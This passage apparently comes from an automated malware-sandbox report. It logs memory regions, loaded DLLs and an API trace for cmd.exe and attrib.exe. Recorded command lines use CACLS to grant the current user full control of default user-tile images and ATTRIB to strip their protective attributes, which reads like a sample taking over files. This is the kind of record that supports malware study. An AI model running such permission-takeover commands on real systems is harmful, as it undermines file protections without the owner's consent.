= 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 25802 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25803 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25804 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25805 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25806 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25807 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25808 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 503 os_tid = 0x6fc Thread: id = 504 os_tid = 0xdcc Process: id = "351" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xec4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "349" os_parent_pid = "0xc54" cmd_line = 
"ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25809 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25810 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25811 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25812 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 25813 start_va = 0xc10000 end_va = 0xc16fff entry_point = 0xc10000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25814 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25815 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25816 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 25817 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25818 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25819 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25820 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25821 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 25822 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 25823 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25824 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25825 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25826 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25827 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = 
"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25828 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25829 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25830 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25831 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25832 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25833 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25834 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25835 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25836 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: 
id = 25837 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25838 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 505 os_tid = 0x70c Process: id = "352" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xd9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25839 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25840 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25841 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25842 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 25843 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25844 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25845 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25846 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25847 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 25848 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25849 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25850 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25851 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25852 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 25853 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = 
"private_0x00000000003f0000" filename = "" Region: id = 25854 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25855 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25856 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25857 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25858 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25859 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25860 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25861 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25862 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 25863 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 25864 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25865 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25866 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25867 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 25868 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25869 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25870 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 25871 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 25872 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 25873 start_va = 0x1370000 end_va = 0x163efff entry_point = 0x1370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 
506 os_tid = 0x394 [0182.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fbe4 | out: lpSystemTimeAsFileTime=0x20fbe4*(dwLowDateTime=0xa1f46c60, dwHighDateTime=0x1d440a9)) [0182.965] GetCurrentProcessId () returned 0xd9c [0182.965] GetCurrentThreadId () returned 0x394 [0182.965] GetTickCount () returned 0x346a0 [0182.965] QueryPerformanceCounter (in: lpPerformanceCount=0x20fbdc | out: lpPerformanceCount=0x20fbdc*=23975421073) returned 1 [0182.966] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0182.966] __set_app_type (_Type=0x1) [0182.966] __p__fmode () returned 0x76b331f4 [0182.966] __p__commode () returned 0x76b331fc [0182.966] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0182.966] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0182.966] GetCurrentThreadId () returned 0x394 [0182.966] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x394) returned 0x38 [0182.966] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.966] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0182.966] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.967] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0182.967] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fb74 | out: phkResult=0x20fb74*=0x0) returned 0x2 [0182.967] VirtualQuery (in: lpAddress=0x20fbab, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.967] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fb44, dwLength=0x1c | out: 
lpBuffer=0x20fb44*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0182.967] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0182.967] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.967] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0182.967] GetConsoleOutputCP () returned 0x1b5 [0182.967] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.967] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0182.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.967] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0182.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.967] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.968] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.968] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.968] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.968] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.968] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0182.968] GetEnvironmentStringsW () returned 0x400308* [0182.968] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0182.969] 
GetEnvironmentStringsW () returned 0x400308* [0182.969] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0182.969] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eae4 | out: phkResult=0x20eae4*=0x40) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0xb8, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x0, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] 
RegCloseKey (hKey=0x40) returned 0x0 [0182.969] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eae4 | out: phkResult=0x20eae4*=0x40) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x0, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.969] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x4) returned 0x0 [0182.970] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x1000) returned 0x2 [0182.970] RegCloseKey (hKey=0x40) returned 0x0 [0182.970] time (in: timer=0x0 | out: 
timer=0x0) returned 0x5b886391 [0182.970] srand (_Seed=0x5b886391) [0182.970] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"" [0182.970] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"" [0182.970] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.970] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x401a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0182.970] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.970] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.970] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.971] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0182.971] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0182.971] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0182.971] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0182.971] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0182.971] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 
[0182.971] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0182.971] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0182.971] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0182.971] GetEnvironmentStringsW () returned 0x402458* [0182.971] FreeEnvironmentStringsW (penv=0x402458) returned 1 [0182.971] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.971] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.971] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0182.971] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0182.971] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0182.971] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0182.971] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0182.971] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0182.971] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0182.971] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0182.971] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f8b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.971] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f8b0, lpFilePart=0x20f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f8ac*="Desktop") returned 0x18 [0182.971] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.972] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f62c | out: 